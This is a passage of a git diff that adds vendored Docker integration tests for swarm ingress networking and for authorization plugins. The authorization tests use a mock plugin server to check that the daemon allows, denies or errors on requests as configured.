+	assert.Assert(t, err)
+	defer cli.Close()
+	out, err := cli.NetworkInspect(context.Background(), "bridge", types.NetworkInspectOptions{})
+	assert.NilError(t, err)
+	// Make sure BIP IP doesn't get override with new default address pool .
+	assert.Equal(t, out.IPAM.Config[0].Subnet, "172.60.0.1/16")
+	delInterface(t, defaultNetworkBridge)
+}
+
+func TestServiceWithPredefinedNetwork(t *testing.T) {
+	defer setupTest(t)()
+	d := swarm.NewSwarm(t, testEnv)
+	defer d.Stop(t)
+	client := d.NewClientT(t)
+	defer client.Close()
+
+	hostName := "host"
+	var instances uint64 = 1
+	serviceName := "TestService" + t.Name()
+
+	serviceID := swarm.CreateService(t, d,
+		swarm.ServiceWithReplicas(instances),
+		swarm.ServiceWithName(serviceName),
+		swarm.ServiceWithNetwork(hostName),
+	)
+
+	poll.WaitOn(t, serviceRunningCount(client, serviceID, instances), swarm.ServicePoll)
+
+	_, _, err := client.ServiceInspectWithRaw(context.Background(), serviceID, types.ServiceInspectOptions{})
+	assert.NilError(t, err)
+
+	err = client.ServiceRemove(context.Background(), serviceID)
+	assert.NilError(t, err)
+}
+
+const ingressNet = "ingress"
+
+func TestServiceRemoveKeepsIngressNetwork(t *testing.T) {
+	defer setupTest(t)()
+	d := swarm.NewSwarm(t, testEnv)
+	defer d.Stop(t)
+	client := d.NewClientT(t)
+	defer client.Close()
+
+	poll.WaitOn(t, swarmIngressReady(client), swarm.NetworkPoll)
+
+	var instances uint64 = 1
+
+	serviceID := swarm.CreateService(t, d,
+		swarm.ServiceWithReplicas(instances),
+		swarm.ServiceWithName(t.Name()+"-service"),
+		swarm.ServiceWithEndpoint(&swarmtypes.EndpointSpec{
+			Ports: []swarmtypes.PortConfig{
+				{
+					Protocol:    swarmtypes.PortConfigProtocolTCP,
+					TargetPort:  80,
+					PublishMode: swarmtypes.PortConfigPublishModeIngress,
+				},
+			},
+		}),
+	)
+
+	poll.WaitOn(t, serviceRunningCount(client, serviceID, instances), swarm.ServicePoll)
+
+	_, _, err := client.ServiceInspectWithRaw(context.Background(), serviceID, types.ServiceInspectOptions{})
+	assert.NilError(t, err)
+
+	err = client.ServiceRemove(context.Background(), serviceID)
+	assert.NilError(t, err)
+
+	poll.WaitOn(t, serviceIsRemoved(client, serviceID), swarm.ServicePoll)
+	poll.WaitOn(t, noServices(client), swarm.ServicePoll)
+
+	// Ensure that "ingress" is not removed or corrupted
+	time.Sleep(10 * time.Second)
+	netInfo, err := client.NetworkInspect(context.Background(), ingressNet, types.NetworkInspectOptions{
+		Verbose: true,
+		Scope:   "swarm",
+	})
+	assert.NilError(t, err, "Ingress network was removed after removing service!")
+	assert.Assert(t, len(netInfo.Containers) != 0, "No load balancing endpoints in ingress network")
+	assert.Assert(t, len(netInfo.Peers) != 0, "No peers (including self) in ingress network")
+	_, ok := netInfo.Containers["ingress-sbox"]
+	assert.Assert(t, ok, "ingress-sbox not present in ingress network")
+}
+
+func serviceRunningCount(client client.ServiceAPIClient, serviceID string, instances uint64) func(log poll.LogT) poll.Result {
+	return func(log poll.LogT) poll.Result {
+		services, err := client.ServiceList(context.Background(), types.ServiceListOptions{})
+		if err != nil {
+			return poll.Error(err)
+		}
+
+		if len(services) != int(instances) {
+			return poll.Continue("Service count at %d waiting for %d", len(services), instances)
+		}
+		return poll.Success()
+	}
+}
+
+func swarmIngressReady(client client.NetworkAPIClient) func(log poll.LogT) poll.Result {
+	return func(log poll.LogT) poll.Result {
+		netInfo, err := client.NetworkInspect(context.Background(), ingressNet, types.NetworkInspectOptions{
+			Verbose: true,
+			Scope:   "swarm",
+		})
+		if err != nil {
+			return poll.Error(err)
+		}
+		np := len(netInfo.Peers)
+		nc := len(netInfo.Containers)
+		if np == 0 || nc == 0 {
+			return poll.Continue("ingress not ready: %d peers and %d containers", nc, np)
+		}
+		_, ok := netInfo.Containers["ingress-sbox"]
+		if !ok {
+			return poll.Continue("ingress not ready: does not contain the ingress-sbox")
+		}
+		return poll.Success()
+	}
+}
+
+func noServices(client client.ServiceAPIClient) func(log poll.LogT) poll.Result {
+	return func(log poll.LogT) poll.Result {
+		services, err := client.ServiceList(context.Background(), types.ServiceListOptions{})
+		switch {
+		case err != nil:
+			return poll.Error(err)
+		case len(services) == 0:
+			return poll.Success()
+		default:
+			return poll.Continue("Service count at %d waiting for 0", len(services))
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration/plugin/authz/authz_plugin_test.go b/vendor/github.com/docker/docker/integration/plugin/authz/authz_plugin_test.go
new file mode 100644
index 0000000000..105affc1af
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/plugin/authz/authz_plugin_test.go
@@ -0,0 +1,521 @@
+// +build !windows
+
+package authz // import "github.com/docker/docker/integration/plugin/authz"
+
+import (
+	"context"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"net"
+	"net/http"
+	"net/http/httputil"
+	"net/url"
+	"os"
+	"path/filepath"
+	"strconv"
+	"strings"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	eventtypes "github.com/docker/docker/api/types/events"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/integration/internal/container"
+	"github.com/docker/docker/internal/test/environment"
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/authorization"
+	"gotest.tools/assert"
+	"gotest.tools/skip"
+)
+
+const (
+	testAuthZPlugin     = "authzplugin"
+	unauthorizedMessage = "User unauthorized authz plugin"
+	errorMessage        = "something went wrong..."
+	serverVersionAPI    = "/version"
+)
+
+var (
+	alwaysAllowed = []string{"/_ping", "/info"}
+	ctrl          *authorizationController
+)
+
+type authorizationController struct {
+	reqRes          authorization.Response // reqRes holds the plugin response to the initial client request
+	resRes          authorization.Response // resRes holds the plugin response to the daemon response
+	versionReqCount int                    // versionReqCount counts the number of requests to the server version API endpoint
+	versionResCount int                    // versionResCount counts the number of responses from the server version API endpoint
+	requestsURIs    []string               // requestsURIs stores all request URIs that are sent to the authorization controller
+	reqUser         string
+	resUser         string
+}
+
+func setupTestV1(t *testing.T) func() {
+	ctrl = &authorizationController{}
+	teardown := setupTest(t)
+
+	err := os.MkdirAll("/etc/docker/plugins", 0755)
+	assert.NilError(t, err)
+
+	fileName := fmt.Sprintf("/etc/docker/plugins/%s.spec", testAuthZPlugin)
+	err = ioutil.WriteFile(fileName, []byte(server.URL), 0644)
+	assert.NilError(t, err)
+
+	return func() {
+		err := os.RemoveAll("/etc/docker/plugins")
+		assert.NilError(t, err)
+
+		teardown()
+		ctrl = nil
+	}
+}
+
+// check for always allowed endpoints to not inhibit test framework functions
+func isAllowed(reqURI string) bool {
+	for _, endpoint := range alwaysAllowed {
+		if strings.HasSuffix(reqURI, endpoint) {
+			return true
+		}
+	}
+	return false
+}
+
+func TestAuthZPluginAllowRequest(t *testing.T) {
+	defer setupTestV1(t)()
+	ctrl.reqRes.Allow = true
+	ctrl.resRes.Allow = true
+	d.StartWithBusybox(t, "--authorization-plugin="+testAuthZPlugin)
+
+	client, err := d.NewClient()
+	assert.NilError(t, err)
+
+	ctx := context.Background()
+
+	// Ensure command successful
+	cID := container.Run(t, ctx, client)
+
+	assertURIRecorded(t, ctrl.requestsURIs, "/containers/create")
+	assertURIRecorded(t, ctrl.requestsURIs, fmt.Sprintf("/containers/%s/start", cID))
+
+	_, err = client.ServerVersion(ctx)
+	assert.NilError(t, err)
+	assert.Equal(t, 1, ctrl.versionReqCount)
+	assert.Equal(t, 1, ctrl.versionResCount)
+}
+
+func TestAuthZPluginTLS(t *testing.T) {
+	defer setupTestV1(t)()
+	const (
+		testDaemonHTTPSAddr = "tcp://localhost:4271"
+		cacertPath          = "../../testdata/https/ca.pem"
+		serverCertPath      = "../../testdata/https/server-cert.pem"
+		serverKeyPath       = "../../testdata/https/server-key.pem"
+		clientCertPath      = "../../testdata/https/client-cert.pem"
+		clientKeyPath       = "../../testdata/https/client-key.pem"
+	)
+
+	d.Start(t,
+		"--authorization-plugin="+testAuthZPlugin,
+		"--tlsverify",
+		"--tlscacert", cacertPath,
+		"--tlscert", serverCertPath,
+		"--tlskey", serverKeyPath,
+		"-H", testDaemonHTTPSAddr)
+
+	ctrl.reqRes.Allow = true
+	ctrl.resRes.Allow = true
+
+	client, err := newTLSAPIClient(testDaemonHTTPSAddr, cacertPath, clientCertPath, clientKeyPath)
+	assert.NilError(t, err)
+
+	_, err = client.ServerVersion(context.Background())
+	assert.NilError(t, err)
+
+	assert.Equal(t, "client", ctrl.reqUser)
+	assert.Equal(t, "client", ctrl.resUser)
+}
+
+func newTLSAPIClient(host, cacertPath, certPath, keyPath string) (client.APIClient, error) {
+	dialer := &net.Dialer{
+		KeepAlive: 30 * time.Second,
+		Timeout:   30 * time.Second,
+	}
+	return client.NewClientWithOpts(
+		client.WithTLSClientConfig(cacertPath, certPath, keyPath),
+		client.WithDialer(dialer),
+		client.WithHost(host))
+}
+
+func TestAuthZPluginDenyRequest(t *testing.T) {
+	defer setupTestV1(t)()
+	d.Start(t, "--authorization-plugin="+testAuthZPlugin)
+	ctrl.reqRes.Allow = false
+	ctrl.reqRes.Msg = unauthorizedMessage
+
+	client, err := d.NewClient()
+	assert.NilError(t, err)
+
+	// Ensure command is blocked
+	_, err = client.ServerVersion(context.Background())
+	assert.Assert(t, err != nil)
+	assert.Equal(t, 1, ctrl.versionReqCount)
+	assert.Equal(t, 0, ctrl.versionResCount)
+
+	// Ensure unauthorized message appears in response
+	assert.Equal(t, fmt.Sprintf("Error response from daemon: authorization denied by plugin %s: %s", testAuthZPlugin, unauthorizedMessage), err.Error())
+}
+
+// TestAuthZPluginAPIDenyResponse validates that when authorization
+// plugin deny the request, the status code is forbidden
+func TestAuthZPluginAPIDenyResponse(t *testing.T) {
+	defer setupTestV1(t)()
+	d.Start(t, "--authorization-plugin="+testAuthZPlugin)
+	ctrl.reqRes.Allow = false
+	ctrl.resRes.Msg = unauthorizedMessage
+
+	daemonURL, err := url.Parse(d.Sock())
+	assert.NilError(t, err)
+
+	conn, err := net.DialTimeout(daemonURL.Scheme, daemonURL.Path, time.Second*10)
+	assert.NilError(t, err)
+	client := httputil.NewClientConn(conn, nil)
+	req, err := http.NewRequest("GET", "/version", nil)
+	assert.NilError(t, err)
+	resp, err := client.Do(req)
+
+	assert.NilError(t, err)
+	assert.DeepEqual(t, http.StatusForbidden, resp.StatusCode)
+}
+
+func TestAuthZPluginDenyResponse(t *testing.T) {
+	defer setupTestV1(t)()
+	d.Start(t, "--authorization-plugin="+testAuthZPlugin)
+	ctrl.reqRes.Allow = true
+	ctrl.resRes.Allow = false
+	ctrl.resRes.Msg = unauthorizedMessage
+
+	client, err := d.NewClient()
+	assert.NilError(t, err)
+
+	// Ensure command is blocked
+	_, err = client.ServerVersion(context.Background())
+	assert.Assert(t, err != nil)
+	assert.Equal(t, 1, ctrl.versionReqCount)
+	assert.Equal(t, 1, ctrl.versionResCount)
+
+	// Ensure unauthorized message appears in response
+	assert.Equal(t, fmt.Sprintf("Error response from daemon: authorization denied by plugin %s: %s", testAuthZPlugin, unauthorizedMessage), err.Error())
+}
+
+// TestAuthZPluginAllowEventStream verifies event stream propagates
+// correctly after request pass through by the authorization plugin
+func TestAuthZPluginAllowEventStream(t *testing.T) {
+	skip.If(t, testEnv.DaemonInfo.OSType != "linux")
+
+	defer setupTestV1(t)()
+	ctrl.reqRes.Allow = true
+	ctrl.resRes.Allow = true
+	d.StartWithBusybox(t, "--authorization-plugin="+testAuthZPlugin)
+
+	client, err := d.NewClient()
+	assert.NilError(t, err)
+
+	ctx := context.Background()
+
+	startTime := strconv.FormatInt(systemTime(t, client, testEnv).Unix(), 10)
+	events, errs, cancel := systemEventsSince(client, startTime)
+	defer cancel()
+
+	// Create a container and wait for the creation events
+	cID := container.Run(t, ctx, client)
+
+	for i := 0; i < 100; i++ {
+		c, err := client.ContainerInspect(ctx, cID)
+		assert.NilError(t, err)
+		if c.State.Running {
+			break
+		}
+		if i == 99 {
+			t.Fatal("Container didn't run within 10s")
+		}
+		time.Sleep(100 * time.Millisecond)
+	}
+
+	created := false
+	started := false
+	for !created && !started {
+		select {
+		case event := <-events:
+			if event.Type == eventtypes.ContainerEventType && event.Actor.ID == cID {
+				if event.Action == "create" {
+					created = true
+				}
+				if event.Action == "start" {
+					started = true
+				}
+			}
+		case err := <-errs:
+			if err == io.EOF {
+				t.Fatal("premature end of event stream")
+			}
+			assert.NilError(t, err)
+		case <-time.After(30 * time.Second):
+			// Fail the test
+			t.Fatal("event stream timeout")
+		}
+	}
+
+	// Ensure both events and container endpoints are passed to the
+	// authorization plugin
+	assertURIRecorded(t, ctrl.requestsURIs, "/events")
+	assertURIRecorded(t, ctrl.requestsURIs, "/containers/create")
+	assertURIRecorded(t, ctrl.requestsURIs, fmt.Sprintf("/containers/%s/start", cID))
+}
+
+func systemTime(t *testing.T, client client.APIClient, testEnv *environment.Execution) time.Time {
+	if testEnv.IsLocalDaemon() {
+		return time.Now()
+	}
+
+	ctx := context.Background()
+	info, err := client.Info(ctx)
+	assert.NilError(t, err)
+
+	dt, err := time.Parse(time.RFC3339Nano, info.SystemTime)
+	assert.NilError(t, err, "invalid time format in GET /info response")
+	return dt
+}
+
+func systemEventsSince(client client.APIClient, since string) (<-chan eventtypes.Message, <-chan error, func()) {
+	eventOptions := types.EventsOptions{
+		Since: since,
+	}
+	ctx, cancel := context.WithCancel(context.Background())
+	events, errs := client.Events(ctx, eventOptions)
+
+	return events, errs, cancel
+}
+
+func TestAuthZPluginErrorResponse(t *testing.T) {
+	defer setupTestV1(t)()
+	d.Start(t, "--authorization-plugin="+testAuthZPlugin)
+	ctrl.reqRes.Allow = true
+	ctrl.resRes.Err = errorMessage
+
+	client, err := d.NewClient()
+	assert.NilError(t, err)
+
+	// Ensure command is blocked
+	_, err = client.ServerVersion(context.Background())
+	assert.Assert(t, err != nil)
+	assert.Equal(t, fmt.Sprintf("Error response from daemon: plugin %s failed with error: %s: %s", testAuthZPlugin, authorization.AuthZApiResponse, errorMessage), err.Error())
+}
+
+func TestAuthZPluginErrorRequest(t *testing.T) {
+	defer setupTestV1(t)()
+	d.Start(t, "--authorization-plugin="+testAuthZPlugin)
+	ctrl.reqRes.Err = errorMessage
+
+	client, err := d.NewClient()
+	assert.NilError(t, err)
+
+	// Ensure command is blocked
+	_, err = client.ServerVersion(context.Background())
+	assert.Assert(t, err != nil)
+	assert.Equal(t, fmt.Sprintf("Error response from daemon: plugin %s failed with error: %s: %s", testAuthZPlugin, authorization.AuthZApiRequest, errorMessage), err.Error())
+}
+
+func TestAuthZPluginEnsureNoDuplicatePluginRegistration(t *testing.T) {
+	defer setupTestV1(t)()
+	d.Start(t, "--authorization-plugin="+testAuthZPlugin, "--authorization-plugin="+testAuthZPlugin)
+
+	ctrl.reqRes.Allow = true
+	ctrl.resRes.Allow = true
+
+	client, err := d.NewClient()
+	assert.NilError(t, err)
+
+	_, err = client.ServerVersion(context.Background())
+	assert.NilError(t, err)
+
+	// assert plugin is only called once..
+	assert.Equal(t, 1, ctrl.versionReqCount)
+	assert.Equal(t, 1, ctrl.versionResCount)
+}
+
+func TestAuthZPluginEnsureLoadImportWorking(t *testing.T) {
+	defer setupTestV1(t)()
+	ctrl.reqRes.Allow = true
+	ctrl.resRes.Allow = true
+	d.StartWithBusybox(t, "--authorization-plugin="+testAuthZPlugin, "--authorization-plugin="+testAuthZPlugin)
+
+	client, err := d.NewClient()
+	assert.NilError(t, err)
+
+	ctx := context.Background()
+
+	tmp, err := ioutil.TempDir("", "test-authz-load-import")
+	assert.NilError(t, err)
+	defer os.RemoveAll(tmp)
+
+	savedImagePath := filepath.Join(tmp, "save.tar")
+
+	err = imageSave(client, savedImagePath, "busybox")
+	assert.NilError(t, err)
+	err = imageLoad(client, savedImagePath)
+	assert.NilError(t, err)
+
+	exportedImagePath := filepath.Join(tmp, "export.tar")
+
+	cID := container.Run(t, ctx, client)
+
+	responseReader, err := client.ContainerExport(context.Background(), cID)
+	assert.NilError(t, err)
+	defer responseReader.Close()
+	file, err := os.Create(exportedImagePath)
+	assert.NilError(t, err)
+	defer file.Close()
+	_, err = io.Copy(file, responseReader)
+	assert.NilError(t, err)
+
+	err = imageImport(client, exportedImagePath)
+	assert.NilError(t, err)
+}
+
+func TestAuthzPluginEnsureContainerCopyToFrom(t *testing.T) {
+	defer setupTestV1(t)()
+	ctrl.reqRes.Allow = true
+	ctrl.resRes.Allow = true
+	d.StartWithBusybox(t, "--authorization-plugin="+testAuthZPlugin, "--authorization-plugin="+testAuthZPlugin)
+
+	dir, err := ioutil.TempDir("", t.Name())
+	assert.Assert(t, err)
+	defer os.RemoveAll(dir)
+
+	f, err := ioutil.TempFile(dir, "send")
+	assert.Assert(t, err)
+	defer f.Close()
+
+	buf := make([]byte, 1024)
+	fileSize := len(buf) * 1024 * 10
+	for written := 0; written < fileSize; {
+		n, err := f.Write(buf)
+		assert.Assert(t, err)
+		written += n
+	}
+
+	ctx := context.Background()
+	client, err := d.NewClient()
+	assert.Assert(t, err)
+
+	cID := container.Run(t, ctx, client)
+	defer client.ContainerRemove(ctx, cID, types.ContainerRemoveOptions{Force: true})
+
+	_, err = f.Seek(0, io.SeekStart)
+	assert.Assert(t, err)
+
+	srcInfo, err := archive.CopyInfoSourcePath(f.Name(), false)
+	assert.Assert(t, err)
+	srcArchive, err := archive.TarResource(srcInfo)
+	assert.Assert(t, err)
+	defer srcArchive.Close()
+
+	dstDir, preparedArchive, err := archive.PrepareArchiveCopy(srcArchive, srcInfo, archive.CopyInfo{Path: "/test"})
+	assert.Assert(t, err)
+
+	err = client.CopyToContainer(ctx, cID, dstDir, preparedArchive, types.CopyToContainerOptions{})
+	assert.Assert(t, err)
+
+	rdr, _, err := client.CopyFromContainer(ctx, cID, "/test")
+	assert.Assert(t, err)
+	_, err = io.Copy(ioutil.Discard, rdr)
+	assert.Assert(t, err)
+}
+
+func imageSave(client client.APIClient, path, image string) error {
+	ctx := context.Background()
+	responseReader, err := client.ImageSave(ctx, []string{image})
+	if err != nil {
+		return err
+	}
+	defer responseReader.Close()
+	file, err := os.Create(path)
+	if err != nil {
+		return err
+	}
+	defer file.Close()
+	_, err = io.Copy(file, responseReader)
+	return err
+}
+
+func imageLoad(client client.APIClient, path string) error {
+	file, err := os.Open(path)
+	if err != nil {
+		return err
+	}
+	defer file.Close()
+	quiet := true
+	ctx := context.Background()
+	response, err := client.ImageLoad(ctx, file, quiet)
+	if err != nil {
+		return err
+	}
+	defer response.Body.Close()
+	return nil
+}
+
+func imageImport(client client.APIClient, path string) error {
+	file, err := os.Open(path)
+	if err != nil {
+		return err
+	}
+	defer file.Close()
+	options := types.ImageImportOptions{}
+	ref := ""
+	source := types.ImageImportSource{
+		Source:     file,
+		SourceName: "-",
+	}
+	ctx := context.Background()
+	responseReader, err := client.ImageImport(ctx, source, ref, options)
+	if err != nil {
+		return err
+	}
+	defer responseReader.Close()
+	return nil
+}
+
+func TestAuthZPluginHeader(t *testing.T) {
+	defer setupTestV1(t)()
+	ctrl.reqRes.Allow = true
+	ctrl.resRes.Allow = true
+	d.StartWithBusybox(t, "--debug", "--authorization-plugin="+testAuthZPlugin)
+
+	daemonURL, err := url.Parse(d.Sock())
+	assert.NilError(t, err)
+
+	conn, err := net.DialTimeout(daemonURL.Scheme, daemonURL.Path, time.Second*10)
+	assert.NilError(t, err)
+	client := httputil.NewClientConn(conn, nil)
+	req, err := http.NewRequest("GET", "/version", nil)
+	assert.NilError(t, err)
+	resp, err := client.Do(req)
+	assert.NilError(t, err)
+	assert.Equal(t, "application/json", resp.Header["Content-Type"][0])
+}
+
+// assertURIRecorded verifies that the given URI was sent and recorded
+// in the authz plugin
+func assertURIRecorded(t *testing.T, uris []string, uri string) {
+	var found bool
+	for _, u := range uris {
+		if strings.Contains(u, uri) {
+			found = true
+			break
+		}
+	}
+	if !found {
+		t.Fatalf("Expected to find URI '%s', recorded uris '%s'", uri, strings.Join(uris, ","))
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration/plugin/authz/authz_plugin_v2_test.go b/vendor/github.com/docker/docker/integration/plugin/authz/authz_plugin_v2_test.go
new file mode 100644
index 0000000000..5ebaca41c6
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/plugin/authz/authz_plugin_v2_test.go
@@ -0,0 +1,175 @@
+// +build !windows
+
+package authz // import "github.com/docker/docker/integration/plugin/authz"
+
+import (
+	"context"
+	"fmt"
+	"io/ioutil"
+	"os"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	volumetypes "github.com/docker/docker/api/types/volume"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/integration/internal/container"
+	"github.com/docker/docker/integration/internal/requirement"
+	"gotest.tools/assert"
+	"gotest.tools/skip"
+)
+
+var (
+	authzPluginName            = "riyaz/authz-no-volume-plugin"
+	authzPluginTag             = "latest"
+	authzPluginNameWithTag     = authzPluginName + ":" + authzPluginTag
+	authzPluginBadManifestName = "riyaz/authz-plugin-bad-manifest"
+	nonexistentAuthzPluginName = "riyaz/nonexistent-authz-plugin"
+)
+
+func setupTestV2(t *testing.T) func() {
+	skip.If(t, testEnv.DaemonInfo.OSType != "linux")
+	skip.If(t, !requirement.HasHubConnectivity(t))
+
+	teardown := setupTest(t)
+
+	d.Start(t)
+
+	return teardown
+}
+
+func TestAuthZPluginV2AllowNonVolumeRequest(t *testing.T) {
+	skip.If(t, os.Getenv("DOCKER_ENGINE_GOARCH") != "amd64")
+	defer setupTestV2(t)()
+
+	client, err := d.NewClient()
+	assert.NilError(t, err)
+
+	ctx := context.Background()
+
+	// Install authz plugin
+	err = pluginInstallGrantAllPermissions(client, authzPluginNameWithTag)
+	assert.NilError(t, err)
+	// start the daemon with the plugin and load busybox, --net=none build fails otherwise
+	// because it needs to pull busybox
+	d.Restart(t, "--authorization-plugin="+authzPluginNameWithTag)
+	d.LoadBusybox(t)
+
+	// Ensure docker run command and accompanying docker ps are successful
+	cID := container.Run(t, ctx, client)
+
+	_, err = client.ContainerInspect(ctx, cID)
+	assert.NilError(t, err)
+}
+
+func TestAuthZPluginV2Disable(t *testing.T) {
+	skip.If(t, os.Getenv("DOCKER_ENGINE_GOARCH") != "amd64")
+	defer setupTestV2(t)()
+
+	client, err := d.NewClient()
+	assert.NilError(t, err)
+
+	// Install authz plugin
+	err = pluginInstallGrantAllPermissions(client, authzPluginNameWithTag)
+	assert.NilError(t, err)
+
+	d.Restart(t, "--authorization-plugin="+authzPluginNameWithTag)
+	d.LoadBusybox(t)
+
+	_, err = client.VolumeCreate(context.Background(), volumetypes.VolumeCreateBody{Driver: "local"})
+	assert.Assert(t, err != nil)
+	assert.Assert(t, strings.Contains(err.Error(), fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag)))
+
+	// disable the plugin
+	err = client.PluginDisable(context.Background(), authzPluginNameWithTag, types.PluginDisableOptions{})
+	assert.NilError(t, err)
+
+	// now test to see if the docker api works.
+	_, err = client.VolumeCreate(context.Background(), volumetypes.VolumeCreateBody{Driver: "local"})
+	assert.NilError(t, err)
+}
+
+func TestAuthZPluginV2RejectVolumeRequests(t *testing.T) {
+	skip.If(t, os.Getenv("DOCKER_ENGINE_GOARCH") != "amd64")
+	defer setupTestV2(t)()
+
+	client, err := d.NewClient()
+	assert.NilError(t, err)
+
+	// Install authz plugin
+	err = pluginInstallGrantAllPermissions(client, authzPluginNameWithTag)
+	assert.NilError(t, err)
+
+	// restart the daemon with the plugin
+	d.Restart(t, "--authorization-plugin="+authzPluginNameWithTag)
+
+	_, err = client.VolumeCreate(context.Background(), volumetypes.VolumeCreateBody{Driver: "local"})
+	assert.Assert(t, err != nil)
+	assert.Assert(t, strings.Contains(err.Error(), fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag)))
+
+	_, err = client.VolumeList(context.Background(), filters.Args{})
+	assert.Assert(t, err != nil)
+	assert.Assert(t, strings.Contains(err.Error(), fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag)))
+
+	// The plugin will block the command before it can determine the volume does not exist
+	err = client.VolumeRemove(context.Background(), "test", false)
+	assert.Assert(t, err != nil)
+	assert.Assert(t, strings.Contains(err.Error(), fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag)))
+
+	_, err = client.VolumeInspect(context.Background(), "test")
+	assert.Assert(t, err != nil)
+	assert.Assert(t, strings.Contains(err.Error(), fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag)))
+
+	_, err = client.VolumesPrune(context.Background(), filters.Args{})
+	assert.Assert(t, err != nil)
+	assert.Assert(t, strings.Contains(err.Error(), fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag)))
+}
+
+func TestAuthZPluginV2BadManifestFailsDaemonStart(t *testing.T) {
+	skip.If(t, os.Getenv("DOCKER_ENGINE_GOARCH") != "amd64")
+	defer setupTestV2(t)()
+
+	client, err := d.NewClient()
+	assert.NilError(t, err)
+
+	// Install authz plugin with bad manifest
+	err = pluginInstallGrantAllPermissions(client, authzPluginBadManifestName)
+	assert.NilError(t, err)
+
+	// start the daemon with the plugin, it will error
+	err = d.RestartWithError("--authorization-plugin=" + authzPluginBadManifestName)
+	assert.Assert(t, err != nil)
+
+	// restarting the daemon without requiring the plugin will succeed
+	d.Start(t)
+}
+
+func TestAuthZPluginV2NonexistentFailsDaemonStart(t *testing.T) {
+	defer setupTestV2(t)()
+
+	// start the daemon with a non-existent authz plugin, it will error
+	err := d.RestartWithError("--authorization-plugin=" + nonexistentAuthzPluginName)
+	assert.Assert(t, err != nil)
+
+	// restarting the daemon without requiring the plugin will succeed
+	d.Start(t)
+}
+
+func pluginInstallGrantAllPermissions(client client.APIClient, name string) error {
+	ctx := context.Background()
+	options := types.PluginInstallOptions{
+		RemoteRef:            name,
+		AcceptAllPermissions: true,
+	}
+	responseReader, err := client.PluginInstall(ctx, "", options)
+	if err != nil {
+		return err
+	}
+	defer responseReader.Close()
+	// we have to read the response out here because the client API
+	// actually starts a goroutine which we can only be sure has
+	// completed when we get EOF from reading responseBody
+	_, err = ioutil.ReadAll(responseReader)
+	return err
+}
diff --git a/vendor/github.com/docker/docker/integration/plugin/authz/main_test.go b/vendor/github.com/docker/docker/integration/plugin/authz/main_test.go
new file mode 100644
index 0000000000..75555dc96f
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/plugin/authz/main_test.go
@@ -0,0 +1,180 @@
+// +build !windows
+
+package authz // import "github.com/docker/docker/integration/plugin/authz"
+
+import (
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"net/http/httptest"
+	"os"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/internal/test/daemon"
+	"github.com/docker/docker/internal/test/environment"
+	"github.com/docker/docker/pkg/authorization"
+	"github.com/docker/docker/pkg/plugins"
+	"gotest.tools/skip"
+)
+
+var (
+	testEnv *environment.Execution
+	d       *daemon.Daemon
+	server  *httptest.Server
+)
+
+func TestMain(m *testing.M) {
+	var err error
+	testEnv, err = environment.New()
+	if err != nil {
+		fmt.Println(err)
+		os.Exit(1)
+	}
+	err = environment.EnsureFrozenImagesLinux(testEnv)
+	if err != nil {
+		fmt.Println(err)
+		os.Exit(1)
+	}
+
+	testEnv.Print()
+	setupSuite()
+	exitCode := m.Run()
+	teardownSuite()
+
+	os.Exit(exitCode)
+}
+
+func setupTest(t *testing.T) func() {
+	skip.If(t, testEnv.IsRemoteDaemon, "cannot run daemon when remote daemon")
+	environment.ProtectAll(t, testEnv)
+
+	d = daemon.New(t, daemon.WithExperimental)
+
+	return func() {
+		if d != nil {
+			d.Stop(t)
+		}
+		testEnv.Clean(t)
+	}
+}
+
+func setupSuite() {
+	mux := http.NewServeMux()
+	server = httptest.NewServer(mux)
+
+	mux.HandleFunc("/Plugin.Activate", func(w http.ResponseWriter, r *http.Request) {
+		b, err := json.Marshal(plugins.Manifest{Implements: []string{authorization.AuthZApiImplements}})
+		if err != nil {
+			panic("could not marshal json for /Plugin.Activate: " + err.Error())
+		}
+		w.Write(b)
+	})
+
+	mux.HandleFunc("/AuthZPlugin.AuthZReq", func(w http.ResponseWriter, r *http.Request) {
+		defer r.Body.Close()
+		body, err := ioutil.ReadAll(r.Body)
+		if err != nil {
+			panic("could not read body for /AuthZPlugin.AuthZReq: " + err.Error())
+		}
+		authReq := authorization.Request{}
+		err = json.Unmarshal(body, &authReq)
+		if err != nil {
+			panic("could not unmarshal json for /AuthZPlugin.AuthZReq: " + err.Error())
+		}
+
+		assertBody(authReq.RequestURI, authReq.RequestHeaders, authReq.RequestBody)
+		assertAuthHeaders(authReq.RequestHeaders)
+
+		// Count only server version api
+		if strings.HasSuffix(authReq.RequestURI, serverVersionAPI) {
+			ctrl.versionReqCount++
+		}
+
+		ctrl.requestsURIs = append(ctrl.requestsURIs, authReq.RequestURI)
+
+		reqRes := ctrl.reqRes
+		if isAllowed(authReq.RequestURI) {
+			reqRes = authorization.Response{Allow: true}
+		}
+		if reqRes.Err != "" {
+			w.WriteHeader(http.StatusInternalServerError)
+		}
+		b, err := json.Marshal(reqRes)
+		if err != nil {
+			panic("could not marshal json for /AuthZPlugin.AuthZReq: " + err.Error())
+		}
+
+		ctrl.reqUser = authReq.User
+		w.Write(b)
+	})
+
+	mux.HandleFunc("/AuthZPlugin.AuthZRes", func(w http.ResponseWriter, r *http.Request) {
+		defer r.Body.Close()
+		body, err := ioutil.ReadAll(r.Body)
+		if err != nil {
+			panic("could not read body for /AuthZPlugin.AuthZRes: " + err.Error())
+		}
+		authReq := authorization.Request{}
+		err = json.Unmarshal(body, &authReq)
